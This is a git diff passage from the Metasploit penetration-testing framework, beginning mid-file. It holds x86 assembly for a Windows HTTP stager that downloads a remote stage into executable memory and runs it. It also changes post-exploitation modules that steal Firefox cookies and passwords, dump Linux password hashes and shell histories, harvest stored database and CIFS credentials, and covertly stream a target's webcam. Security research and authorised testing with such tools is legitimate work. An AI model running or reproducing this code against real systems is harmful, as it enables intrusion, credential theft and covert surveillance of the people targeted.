+  push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
+    ;0x80000000 |        ; INTERNET_FLAG_RELOAD
+    ;0x04000000 |        ; INTERNET_NO_CACHE_WRITE
+    ;0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
+    ;0x00000200 |        ; INTERNET_FLAG_NO_UI
+    ;0x00400000          ; INTERNET_FLAG_KEEP_CONNECTION
+  push edx               ; accept types
+  push edx               ; referrer
+  push edx               ; version
+  push ecx               ; url
+  push edx               ; method
+  push eax               ; hConnection
+  push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
+  call ebp
+  mov esi, eax           ; hHttpRequest
+
+set_retry:
+  push 0x10
+  pop ebx
+
+httpsendrequest:
+  xor edi, edi
+  push edi               ; optional length
+  push edi               ; optional
+  push edi               ; dwHeadersLength
+  push edi               ; headers
+  push esi               ; hHttpRequest
+  push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )
+  call ebp
+  test eax,eax
+  jnz allocate_memory
+
+try_it_again:
+  dec ebx
+  jz failure
+  jmp.i8 httpsendrequest
+
+dbl_get_server_host:
+  jmp get_server_host
+
+get_server_uri:
+  call httpopenrequest
+
+server_uri:
+ db "#{Rex::Text.hexify(uri.request_uri, 99999).strip}?/12345", 0x00
+
+failure:
+  push 0x56A2B5F0        ; hardcoded to exitprocess for size
+  call ebp
+
+allocate_memory:
+  push 0x40         ; PAGE_EXECUTE_READWRITE
+  push 0x1000            ; MEM_COMMIT
+  push 0x00400000        ; Stage allocation (8Mb ought to do us)
+  push edi               ; NULL as we dont care where the allocation is
+  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+download_prep:
+  xchg eax, ebx          ; place the allocated base address in ebx
+  push ebx               ; store a copy of the stage base address on the stack
+  push ebx               ; temporary storage for bytes read count
+  mov edi, esp           ; &bytesRead
+
+download_more:
+  push edi               ; &bytesRead
+  push 8192              ; read length
+  push ebx               ; buffer
+  push esi               ; hRequest
+  push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )
+  call ebp
+
+  test eax,eax           ; download failed? (optional?)
+  jz failure
+
+  mov eax, [edi]
+  add ebx, eax           ; buffer += bytes_received
+
+  test eax,eax           ; optional?
+  jnz download_more      ; continue until it returns 0
+  pop eax                ; clear the temporary storage
+
+execute_stage:
+  ret                    ; dive into the stored stage address
+
+get_server_host:
+  call internetconnect
+
+server_host:
+db "#{Rex::Text.hexify(uri.host, 99999).strip}", 0x00
+
+EOS
+    self.module_info['Stager']['Assembly'] = payload_data.to_s
+    super
+  end
+end
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb
index d4dd790a69..1a1afd3dfa 100644
--- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb
+++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb
@@ -6,12 +6,16 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_ipv6_http'
-
+require 'msf/core/module/deprecated'
 
 module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
+  include Msf::Module::Deprecated
+
+  DEPRECATION_DATE = Date.new(2014, 7, 30)
+  DEPRECATION_REPLACEMENT = 'windows/meterpreter/reverse_https'
 
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb
index fd0206c91c..f2c7c3e40a 100644
--- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb
+++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb
@@ -3,13 +3,19 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+
 require 'msf/core'
 require 'msf/core/handler/reverse_ipv6_https'
+require 'msf/core/module/deprecated'
 
 module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
+  include Msf::Module::Deprecated
+
+  DEPRECATION_DATE = Date.new(2014, 7, 30)
+  DEPRECATION_REPLACEMENT = 'windows/meterpreter/reverse_https'
 
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb
index 63fce13671..0f0118ae68 100644
--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -8,19 +8,25 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/meterpreter_python'
 require 'msf/base/sessions/meterpreter_options'
 
-
 module Metasploit3
   include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})
     super(update_info(info,
       'Name'          => 'Python Meterpreter',
-      'Description'   => 'Run a meterpreter server in Python',
-      'Author'        => ['Spencer McIntyre'],
+      'Description'    => %q{
+        Run a meterpreter server in Python. Supported Python versions
+        are 2.5 - 2.7 and 3.1 - 3.4.
+      },
+      'Author'        => 'Spencer McIntyre',
       'Platform'      => 'python',
       'Arch'          => ARCH_PYTHON,
       'License'       => MSF_LICENSE,
-      'Session'       => Msf::Sessions::Meterpreter_Python_Python))
+      'Session'       => Msf::Sessions::Meterpreter_Python_Python
+    ))
+    register_advanced_options([
+      OptBool.new('DEBUGGING', [ true, "Enable debugging for the Python meterpreter", false ])
+    ], self.class)
   end
 
   def generate_stage
@@ -29,6 +35,11 @@ module Metasploit3
     met = File.open(file, "rb") {|f|
       f.read(f.stat.size)
     }
+
+    if datastore['DEBUGGING']
+      met = met.sub("DEBUGGING = False", "DEBUGGING = True")
+    end
+
     met
   end
 end
diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb
index 9924e2b125..d2a3344bbe 100644
--- a/modules/payloads/stages/windows/meterpreter.rb
+++ b/modules/payloads/stages/windows/meterpreter.rb
@@ -39,7 +39,7 @@ module Metasploit3
   end
 
   def library_path
-    File.join(Msf::Config.data_directory, "meterpreter", "metsrv.x86.dll")
+    MeterpreterBinaries.path('metsrv','x86.dll')
   end
 
 end
diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb
index ffe0e37c5d..cf1232e3ea 100644
--- a/modules/payloads/stages/windows/patchupmeterpreter.rb
+++ b/modules/payloads/stages/windows/patchupmeterpreter.rb
@@ -41,7 +41,7 @@ module Metasploit3
   end
 
   def library_path
-    File.join(Msf::Config.data_directory, "meterpreter", "metsrv.x86.dll")
+    MeterpreterBinaries.path('metsrv','x86.dll')
   end
 
 end
diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb
index fa5aa63801..8065881a67 100644
--- a/modules/payloads/stages/windows/x64/meterpreter.rb
+++ b/modules/payloads/stages/windows/x64/meterpreter.rb
@@ -34,7 +34,7 @@ module Metasploit3
   end
 
   def library_path
-    File.join( Msf::Config.data_directory, "meterpreter", "metsrv.x64.dll" )
+    MeterpreterBinaries.path('metsrv','x64.dll')
   end
 
 end
diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb
index ce6c5a69e7..18cefbef6f 100644
--- a/modules/post/firefox/gather/cookies.rb
+++ b/modules/post/firefox/gather/cookies.rb
@@ -5,11 +5,9 @@
 
 require 'json'
 require 'msf/core'
-require 'msf/core/payload/firefox'
 
 class Metasploit3 < Msf::Post
 
-  include Msf::Payload::Firefox
   include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
 
   def initialize(info={})
@@ -29,12 +27,14 @@ class Metasploit3 < Msf::Post
   end
 
   def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
     if results.present?
       begin
         cookies = JSON.parse(results)
+        cookies.each do |entry|
+          entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
+        end
+
         file = store_loot("firefox.cookies.json", "text/json", rhost, results)
         print_good("Saved #{cookies.length} cookies to #{file}")
       rescue JSON::ParserError => e
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
     %Q|
       (function(send){
         try {
+          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
           var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
                         .getService(Components.interfaces.nsICookieManager);
           var cookies = [];
@@ -54,7 +55,7 @@ class Metasploit3 < Msf::Post
           while (iter.hasMoreElements()){
             var cookie = iter.getNext();
             if (cookie instanceof Components.interfaces.nsICookie){
-              cookies.push({host:cookie.host, name:cookie.name, value:cookie.value})
+              cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})
             }
           }
           send(JSON.stringify(cookies));
diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb
index 75808963c0..1db4ed7993 100644
--- a/modules/post/firefox/gather/history.rb
+++ b/modules/post/firefox/gather/history.rb
@@ -5,11 +5,9 @@
 
 require 'json'
 require 'msf/core'
-require 'msf/core/payload/firefox'
 
 class Metasploit3 < Msf::Post
 
-  include Msf::Payload::Firefox
   include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
 
   def initialize(info={})
@@ -30,9 +28,7 @@ class Metasploit3 < Msf::Post
   end
 
   def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
     if results.present?
       begin
         history = JSON.parse(results)
diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb
index d3db014177..819ac3c81b 100644
--- a/modules/post/firefox/gather/passwords.rb
+++ b/modules/post/firefox/gather/passwords.rb
@@ -29,9 +29,7 @@ class Metasploit3 < Msf::Post
   end
 
   def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
     if results.present?
       begin
         passwords = JSON.parse(results)
@@ -39,8 +37,12 @@ class Metasploit3 < Msf::Post
           entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
         end
 
-        file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)
-        print_good("Saved #{passwords.length} passwords to #{file}")
+        if passwords.length > 0
+          file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)
+          print_good("Saved #{passwords.length} passwords to #{file}")
+        else
+          print_warning("No passwords were found in Firefox.")
+        end
       rescue JSON::ParserError => e
         print_warning(results)
       end
diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
index 4d2e960e69..63049a2a7b 100644
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -10,6 +10,7 @@ require 'msf/core/payload/firefox'
 class Metasploit3 < Msf::Post
 
   include Msf::Payload::Firefox
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
 
   def initialize(info={})
     super(update_info(info,
@@ -36,9 +37,7 @@ class Metasploit3 < Msf::Post
   end
 
   def run
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
-
+    results = js_exec(js_payload)
     if results.present?
       print_good results
     else
diff --git a/modules/post/firefox/manage/webcam_chat.rb b/modules/post/firefox/manage/webcam_chat.rb
new file mode 100644
index 0000000000..c6e5bd8a58
--- /dev/null
+++ b/modules/post/firefox/manage/webcam_chat.rb
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+  include Msf::Post::WebRTC
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Firefox Webcam Chat on Privileged Javascript Shell',
+      'Description'   => %q{
+        This module allows streaming a webcam from a privileged Firefox Javascript shell.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'joev' ],
+      'References'    => [
+        [ 'URL', 'http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode' ]
+      ],
+      'DisclosureDate' => 'May 13 2014'
+    ))
+
+    register_options([
+      OptBool.new('CLOSE', [false, "Forcibly close previous chat session", false]),
+      OptBool.new('VISIBLE', [false, "Show a window containing the chat to the target", false]),
+      OptInt.new('TIMEOUT', [false, "End the chat session after this many seconds", -1]),
+      OptString.new('ICESERVER', [true, "The ICE server that sets up the P2P connection", 'wsnodejs.jit.su:80'])
+    ], self.class)
+  end
+
+  def run
+    unless os_check
+      print_error "Windows versions of Firefox are not supported at this time [RM #8810]."
+      return
+    end
+
+    server     = datastore['ICESERVER']
+    offerer_id = Rex::Text.rand_text_alphanumeric(10)
+    channel    = Rex::Text.rand_text_alphanumeric(20)
+
+    result = js_exec(js_payload(server, offerer_id, channel))
+
+    if datastore['CLOSE']
+      print_status "Stream closed."
+    else
+      if result.present?
+        print_status result
+        connect_video_chat(server, channel, offerer_id)
+      else
+        print_warning "No response received"
+      end
+    end
+  end
+
+  def os_check
+    user_agent = js_exec(%Q|
+      return Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+    |)
+    user_agent !~ /windows/i
+  end
+
+  def js_payload(server, offerer_id, channel)
+    interface = load_interface('offerer.html')
+    api       = load_api_code
+
+    interface.gsub!(/\=SERVER\=/, server)
+    interface.gsub!(/\=CHANNEL\=/, channel)
+    interface.gsub!(/\=OFFERERID\=/, offerer_id)
+
+    if datastore['TIMEOUT'] > 0
+      api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT']*1000}); "
+    end
+
+    url = if datastore['CLOSE']
+      '"about:blank"'
+    else
+      '"data:text/html;base64,"+html'
+    end
+
+    name = if datastore['VISIBLE']
+      Rex::Text.rand_text_alphanumeric(10)
+    else
+      '_self'
+    end
+
+    %Q|
+      (function(send){
+        try {
+
+          var AppShellService = Components
+             .classes["@mozilla.org/appshell/appShellService;1"]
+             .getService(Components.interfaces.nsIAppShellService);
+
+          var html = "#{Rex::Text.encode_base64(interface)}";
+          var url = #{url};
+          AppShellService.hiddenDOMWindow.openDialog(url, '#{name}', 'chrome=1,width=1100,height=600');
+          send("Streaming webcam...");
+
+        } catch (e) {
+          send(e);
+        }
+      })(send);
+    |
+  end
+
+end
diff --git a/modules/post/linux/gather/enum_configs.rb b/modules/post/linux/gather/enum_configs.rb
index 0b03aef6aa..79d207f473 100644
--- a/modules/post/linux/gather/enum_configs.rb
+++ b/modules/post/linux/gather/enum_configs.rb
@@ -23,8 +23,8 @@ class Metasploit3 < Msf::Post
         [
           'ohdae <bindshell[at]live.com>',
         ],
-      'Platform'      => [ 'linux' ],
-      'SessionTypes'  => [ 'shell' ]
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
     ))
   end
 
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post
 
     configs.each do |f|
       output = read_file("#{f}")
-      save(f,  output) if output !~ /No such file or directory/
+      save(f,  output) if output && output !~ /No such file or directory/
     end
   end
 end
diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb
index 52d0ddfd74..72c0a1554c 100644
--- a/modules/post/linux/gather/enum_network.rb
+++ b/modules/post/linux/gather/enum_network.rb
@@ -26,8 +26,8 @@ class Metasploit3 < Msf::Post
             'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing
             'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux
           ],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
+        'Platform'      => ['linux'],
+        'SessionTypes'  => ['shell', 'meterpreter']
       ))
   end
 
diff --git a/modules/post/linux/gather/enum_protections.rb b/modules/post/linux/gather/enum_protections.rb
index f73d96d916..12747a3b65 100644
--- a/modules/post/linux/gather/enum_protections.rb
+++ b/modules/post/linux/gather/enum_protections.rb
@@ -28,8 +28,8 @@ class Metasploit3 < Msf::Post
         [
           'ohdae <bindshell[at]live.com>'
         ],
-      'Platform'      => [ 'linux' ],
-      'SessionTypes'  => [ 'shell' ]
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
     ))
   end
 
diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb
index 9c2b676892..f955b4bed7 100644
--- a/modules/post/linux/gather/enum_system.rb
+++ b/modules/post/linux/gather/enum_system.rb
@@ -29,8 +29,8 @@ class Metasploit3 < Msf::Post
             'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing
             'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid
           ],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
+        'Platform'      => ['linux'],
+        'SessionTypes'  => ['shell', 'meterpreter']
       ))
 
   end
diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb
index c49f88f58d..77650221b1 100644
--- a/modules/post/linux/gather/enum_users_history.rb
+++ b/modules/post/linux/gather/enum_users_history.rb
@@ -26,8 +26,8 @@ class Metasploit3 < Msf::Post
             # based largely on get_bash_history function by Stephen Haywood
             'ohdae <bindshell[at]live.com>'
           ],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
+        'Platform'      => ['linux'],
+        'SessionTypes'  => ['shell', 'meterpreter']
       ))
 
   end
@@ -49,8 +49,8 @@ class Metasploit3 < Msf::Post
     last = execute("/usr/bin/last && /usr/bin/lastlog")
     sudoers = cat_file("/etc/sudoers")
 
-    save("Last logs", last)
-    save("Sudoers", sudoers) unless sudoers =~ /Permission denied/
+    save("Last logs", last) unless last.nil?
+    save("Sudoers", sudoers) unless sudoers.nil? || sudoers =~ /Permission denied/
   end
 
   def save(msg, data, ctype="text/plain")
@@ -96,13 +96,13 @@ class Metasploit3 < Msf::Post
           hist = cat_file("/home/#{u}/.bash_history")
         end
 
-        save("History for #{u}", hist) unless hist =~ /No such file or directory/
+        save("History for #{u}", hist) unless hist.nil? || hist =~ /No such file or directory/
       end
     else
       vprint_status("Extracting history for #{user}")
       hist = cat_file("/home/#{user}/.bash_history")
       vprint_status(hist)
-      save("History for #{user}", hist) unless hist =~ /No such file or directory/
+      save("History for #{user}", hist) unless hist.nil? || hist =~ /No such file or directory/
     end
   end
 
@@ -118,19 +118,19 @@ class Metasploit3 < Msf::Post
           sql_hist = cat_file("/home/#{u}/.mysql_history")
         end
 
-        save("History for #{u}", sql_hist) unless sql_hist =~ /No such file or directory/
+        save("History for #{u}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
       end
     else
       vprint_status("Extracting SQL history for #{user}")
       sql_hist = cat_file("/home/#{user}/.mysql_history")
-      vprint_status(sql_hist)
-      save("SQL History for #{user}", sql_hist) unless sql_hist =~ /No such file or directory/
+      vprint_status(sql_hist) if sql_hist
+      save("SQL History for #{user}", sql_hist) unless sql_hist.nil? || sql_hist =~ /No such file or directory/
     end
   end
 
   def get_vim_history(users, user)
     if user == "root" and users != nil
-      users = users.chomp.split()
+      users = users.chomp.split
       users.each do |u|
         if u == "root"
           vprint_status("Extracting VIM history for #{u}")
@@ -140,13 +140,13 @@ class Metasploit3 < Msf::Post
           vim_hist = cat_file("/home/#{u}/.viminfo")
         end
 
-        save("VIM History for #{u}", vim_hist) unless vim_hist =~ /No such file or directory/
+        save("VIM History for #{u}", vim_hist) unless vim_hist.nil? || vim_hist =~ /No such file or directory/
       end
     else
       vprint_status("Extracting history for #{user}")
       vim_hist = cat_file("/home/#{user}/.viminfo")
       vprint_status(vim_hist)
-      save("VIM History for #{user}", vim_hist) unless vim_hist =~ /No such file or directory/
+      save("VIM History for #{user}", vim_hist) unless vim_hist.nil? || vim_hist =~ /No such file or directory/
     end
   end
 end
diff --git a/modules/post/linux/gather/enum_xchat.rb b/modules/post/linux/gather/enum_xchat.rb
index de2b02fd34..08eb12d8ea 100644
--- a/modules/post/linux/gather/enum_xchat.rb
+++ b/modules/post/linux/gather/enum_xchat.rb
@@ -20,11 +20,11 @@ class Metasploit3 < Msf::Post
         .log files.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'sinn3r'],
-      'Platform'      => [ 'linux' ],
+      'Author'        => ['sinn3r'],
+      'Platform'      => ['linux'],
       # linux meterpreter is too busted to support right now,
       # will come back and add support once it's more usable.
-      'SessionTypes'  => [ 'shell' ],
+      'SessionTypes'  => ['shell', 'meterpreter'],
       'Actions'       =>
         [
           ['CONFIGS', { 'Description' => 'Collect XCHAT\'s config files' } ],
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post
   end
 
   def whoami
-    user = cmd_exec("whoami").chomp
+    user = cmd_exec("/usr/bin/whoami").chomp
     return user
   end
 
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Post
     files.each do |f|
       vprint_status("#{@peer} - Downloading: #{base + f}")
       buf = read_file(base + f)
-      next if buf.empty?
+      next if buf.blank?
       config << {
         :filename => f,
         :data     => buf
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
     @peer = "#{session.session_host}:#{session.session_port}"
 
     user = whoami
-    if user.nil?
+    if user.blank?
       print_error("#{@peer} - Unable to get username, abort.")
       return
     end
@@ -149,8 +149,8 @@ class Metasploit3 < Msf::Post
     configs  = get_configs(base)  if action.name =~ /ALL|CONFIGS/i
     chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i
 
-    save(:configs, configs)   if not configs.empty?
-    save(:chatlogs, chatlogs) if not chatlogs.empty?
+    save(:configs, configs)   unless configs.empty?
+    save(:chatlogs, chatlogs) unless chatlogs.empty?
   end
 
 end
diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb
index 7c8497bf63..d7534025ec 100644
--- a/modules/post/linux/gather/hashdump.rb
+++ b/modules/post/linux/gather/hashdump.rb
@@ -16,11 +16,10 @@ class Metasploit3 < Msf::Post
         'Name'          => 'Linux Gather Dump Password Hashes for Linux Systems',
         'Description'   => %q{ Post Module to dump the password hashes for all users on a Linux System},
         'License'       => MSF_LICENSE,
-        'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
+        'Author'        => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
+        'Platform'      => ['linux'],
+        'SessionTypes'  => ['shell', 'meterpreter']
       ))
-
   end
 
   # Run Method for when run command is issued
@@ -43,11 +42,9 @@ class Metasploit3 < Msf::Post
       # Save pwd file
       upassf = store_loot("linux.hashes", "text/plain", session, john_file, "unshadowed_passwd.pwd", "Linux Unshadowed Password File")
       print_good("Unshadowed Password File: #{upassf}")
-
     else
       print_error("You must run this module as root!")
     end
-
   end
 
   def unshadow(pf,sf)
@@ -63,6 +60,8 @@ class Metasploit3 < Msf::Post
         end
       end
     end
-    return unshadowed
+
+    unshadowed
   end
+
 end
diff --git a/modules/post/linux/gather/mount_cifs_creds.rb b/modules/post/linux/gather/mount_cifs_creds.rb
index d66edf1697..74dee8f557 100644
--- a/modules/post/linux/gather/mount_cifs_creds.rb
+++ b/modules/post/linux/gather/mount_cifs_creds.rb
@@ -11,16 +11,16 @@ class Metasploit3 < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        'Name'          => 'Linux Gather Saved mount.cifs/mount.smbfs Credentials',
-        'Description'   => %q{
-          Post Module to obtain credentials saved for mount.cifs/mount.smbfs in
-          /etc/fstab on a Linux system.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Jon Hart <jhart[at]spoofed.org>'],
-        'Platform'      => [ 'linux' ],
-        'SessionTypes'  => [ 'shell' ]
-      ))
+      'Name'          => 'Linux Gather Saved mount.cifs/mount.smbfs Credentials',
+      'Description'   => %q{
+        Post Module to obtain credentials saved for mount.cifs/mount.smbfs in
+        /etc/fstab on a Linux system.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['Jon Hart <jhart[at]spoofed.org>'],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
+    ))
   end
 
   def run
diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb
index ec4d50729b..a639461250 100644
--- a/modules/post/linux/manage/download_exec.rb
+++ b/modules/post/linux/manage/download_exec.rb
@@ -15,24 +15,23 @@ class Metasploit3 < Msf::Post
     super( update_info( info,
       'Name'          => 'Linux Manage Download and Execute',
       'Description'   => %q{
-          This module downloads and runs a file with bash. It first tries to uses curl as
-        its HTTP client and then wget if it's not found. Bash found in the PATH is used to
-        execute the file.
+        This module downloads and runs a file with bash. It first tries to uses curl as
+        its HTTP client and then wget if it's not found. Bash found in the PATH is used
+        to execute the file.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
           'Joshua D. Abraham <jabra[at]praetorian.com>',
         ],
-      'Platform'      => [ 'linux' ],
-      'SessionTypes'  => [ 'shell' ]
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
     ))
 
     register_options(
       [
         OptString.new('URL', [true, 'Full URL of file to download.'])
       ], self.class)
-
   end
 
   def cmd_exec_vprint(cmd)
diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
new file mode 100644
index 0000000000..f7a433e4a5
--- /dev/null
+++ b/modules/post/multi/gather/dbvis_enum.rb
@@ -0,0 +1,290 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Multi Gather Dbvis Connections Settings',
+        'Description'   => %q{
+          DbVisualizer stores the user database configuration in dbvis.xml.
+          This module retrieves the connections settings from this file.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
+        'Platform'      => %w{ linux win },
+        'SessionTypes'  => [ 'meterpreter', 'shell']
+      ))
+  end
+
+  def run
+
+
+    oldversion = false
+
+    case session.platform
+    when /linux/
+      user = session.shell_command("whoami").chomp
+      print_status("Current user is #{user}")
+      if (user =~ /root/)
+        user_base = "/root/"
+      else
+         user_base = "/home/#{user}/"
+      end
+      dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
+    when /win/
+      if session.type =~ /meterpreter/
+        user_profile = session.sys.config.getenv('USERPROFILE')
+      else
+        user_profile = cmd_exec("echo %USERPROFILE%").strip
+      end
+      dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
+    end
+
+
+    unless file?(dbvis_file)
+      # File not found, we next try with the old config path
+      print_status("File not found: #{dbvis_file}")
+      print_status("This could be an older version of dbvis, trying old path")
+      case session.platform
+      when /linux/
+        dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
+      when /win/
+        dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"
+      end
+      unless file?(dbvis_file)
+        print_error("File not found: #{dbvis_file}")
+        return
+      end
+      oldversion = true
+    end
+
+
+    print_status("Reading: #{dbvis_file}")
+    print_line()
+    raw_xml = ""
+    begin
+      raw_xml = read_file(dbvis_file)
+    rescue EOFError
+      # If there's nothing in the file, we hit EOFError
+      print_error("Nothing read from file: #{dbvis_file}, file may be empty")
+      return
+    end
+
+    if oldversion
+      # Parse old config file
+      db_table = pareseOldConfigFile(raw_xml)
+    else
+      # Parse new config file
+      db_table = pareseNewConfigFile(raw_xml)
+    end
+
+    if db_table.rows.empty?
+      print_status("No database settings found")
+    else
+      print_line("\n")
+      print_line(db_table.to_s)
+      print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun !")
+      print_line()
+      # store found databases
+      p = store_loot(
+        "dbvis.databases",
+        "text/csv",
+        session,
+        db_table.to_csv,
+        "dbvis_databases.txt",
+        "dbvis databases")
+      print_good("Databases settings stored in: #{p.to_s}")
+    end
+
+    print_status("Downloading #{dbvis_file}")
+    p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config")
+    print_good "dbvis.xml saved to #{p.to_s}"
+  end
+
+
+  # New config file parse function
+  def pareseNewConfigFile(raw_xml)
+
+    db_table = Rex::Ui::Text::Table.new(
+    'Header'    => "Dbvis Databases",
+    'Indent'    => 2,
+    'Columns'   =>
+    [
+      "Alias",
+      "Type",
+      "Server",
+      "Port",
+      "Database",
+      "Namespace",
+      "Userid",
+    ])
+
+    dbs = []
+    db = {}
+    dbfound = false
+    versionFound = false
+    # fetch config file
+    raw_xml.each_line do |line|
+
+      if versionFound == false
+         vesrionFound = findVersion(line)
+      end
+
+      if line =~ /<Database id=/
+        dbfound = true
+      elsif line =~ /<\/Database>/
+        dbfound = false
+        if db[:Database].nil?
+          db[:Database] = "";
+        end
+        if db[:Namespace].nil?
+          db[:Namespace] = "";
+        end
+        # save
+        dbs << db if (db[:Alias] and db[:Type] and  db[:Server] and db[:Port] )
+        db = {}
+      end
+
+      if dbfound == true
+        # get the alias
